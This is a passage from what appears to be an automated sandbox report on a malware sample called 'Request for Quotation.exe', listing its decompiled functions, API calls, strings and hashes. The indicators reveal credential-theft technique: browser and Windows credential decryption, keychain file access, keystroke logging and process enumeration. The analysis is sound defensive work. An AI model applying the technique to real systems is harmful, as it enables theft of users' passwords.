                                                                                  • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@Process$?c_str@?$basic_string@CloseHandleOpenTerminateatoi
                                                                                • String ID:
                                                                                • API String ID: 1377568529-0
                                                                                • Opcode ID: c0c842b94adebbeffcdd60d45bfb27ce5f658012aea40baa5d5ea11c5c5959e5
                                                                                • Instruction ID: 2746f951d2caaa68166efb6d96d37f5946b4e222a380c15f16ac4a6add4f85c7
                                                                                • Opcode Fuzzy Hash: c0c842b94adebbeffcdd60d45bfb27ce5f658012aea40baa5d5ea11c5c5959e5
                                                                                • Instruction Fuzzy Hash: 54E0ED72914519CBCB04ABE1EC599ED7324EB90316F50483FE112E60E1EE785555CB1C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040DCD4, Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E0040DCD4() {
				void* _t15;
				intOrPtr _t19;

				E0040AC8C();
				exit(0);
				while(1) {
					_t19 =  *0x41beb8; // 0x0
					if(_t19 == 0) {
						break;
					}
					Sleep(0x64);
				}
				E00408245();
				E004017DD(_t15 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                                                                0x0040dcd4
                                                                                0x0040dcdb
                                                                                0x0040dce3
                                                                                0x0040dce3
                                                                                0x0040dce9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040dced
                                                                                0x0040dced
                                                                                0x0040dcf5
                                                                                0x0040e6a4
                                                                                0x0040e6ac
                                                                                0x0040e6b5
                                                                                0x0040e6c1

                                                                                APIs
                                                                                  • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                                                                  • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                                                                • exit.MSVCRT ref: 0040DCDB
                                                                                • Sleep.KERNEL32(00000064), ref: 0040DCED
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                                                                • String ID:
                                                                                • API String ID: 772260455-0
                                                                                • Opcode ID: 42667989ee0e8f97d07c6c569d129a008f98a6c3cfb6f0e5f586f63e0d7bab1a
                                                                                • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                                                                • Opcode Fuzzy Hash: 42667989ee0e8f97d07c6c569d129a008f98a6c3cfb6f0e5f586f63e0d7bab1a
                                                                                • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406B61, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00406B97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                                                                • String ID: [LCtrl] $ [RCtrl]
                                                                                • API String ID: 4257247948-618823999
                                                                                • Opcode ID: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                                                                • Instruction ID: 4f70cad60a3ff704afd3fe8ce3074508994e3182d9d4e745bddae8050266d9bd
                                                                                • Opcode Fuzzy Hash: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                                                                • Instruction Fuzzy Hash: 60E092B17106147FEA14A66DD81BEFF36BCDB80754F40017AE802E72C1D9E96D4086EA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D8C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                                                                • String ID: open
                                                                                • API String ID: 317973523-2758837156
                                                                                • Opcode ID: a3808c7c2468cb85d51a747e8ff385d3770e9049ec17c88bbace260c6b9dcc0e
                                                                                • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                                                                • Opcode Fuzzy Hash: a3808c7c2468cb85d51a747e8ff385d3770e9049ec17c88bbace260c6b9dcc0e
                                                                                • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: Request for Quotation.exe PID: 6188 Parent PID: 612 Request for Quotation.exeCOMMON

                                                                                Executed Functions

                                                                                Function 0040DD85, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                • API String ID: 594330280-3398334509
                                                                                • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404423, Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 767404330-0
                                                                                • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AE51, Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNext
                                                                                • String ID:
                                                                                • API String ID: 1690352074-0
                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418981, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041898C
                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InfoSystemmemset
                                                                                • String ID:
                                                                                • API String ID: 3558857096-0
                                                                                • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044553B, Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004455C2
                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 0044570D
                                                                                • memset.MSVCRT ref: 00445725
                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                • memset.MSVCRT ref: 0044573D
                                                                                • memset.MSVCRT ref: 00445755
                                                                                • memset.MSVCRT ref: 004458CB
                                                                                • memset.MSVCRT ref: 004458E3
                                                                                • memset.MSVCRT ref: 0044596E
                                                                                • memset.MSVCRT ref: 00445A10
                                                                                • memset.MSVCRT ref: 00445A28
                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                • memset.MSVCRT ref: 00445B52
                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                • memset.MSVCRT ref: 00445B82
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                • memset.MSVCRT ref: 00445986
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                • API String ID: 2151808875-3798722523
                                                                                • Opcode ID: a8a9c9f223d915074a987403ed35d7f77e23cb5200639607a198e1b91b865fee
                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                • Opcode Fuzzy Hash: a8a9c9f223d915074a987403ed35d7f77e23cb5200639607a198e1b91b865fee
                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041276D, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                • API String ID: 2744995895-28296030
                                                                                • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B6EF, Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                • memset.MSVCRT ref: 0040B756
                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                • memset.MSVCRT ref: 0040B851
                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                • memcpy.MSVCRT ref: 0040BB66
                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                                                                • String ID: chp$v10
                                                                                • API String ID: 580435826-2783969131
                                                                                • Opcode ID: 5e147a3699f376e8ab633f9d09c5abb4e2fa433231be96269332ca0cffc53aec
                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                • Opcode Fuzzy Hash: 5e147a3699f376e8ab633f9d09c5abb4e2fa433231be96269332ca0cffc53aec
                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413D4C, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                • memset.MSVCRT ref: 00413E07
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
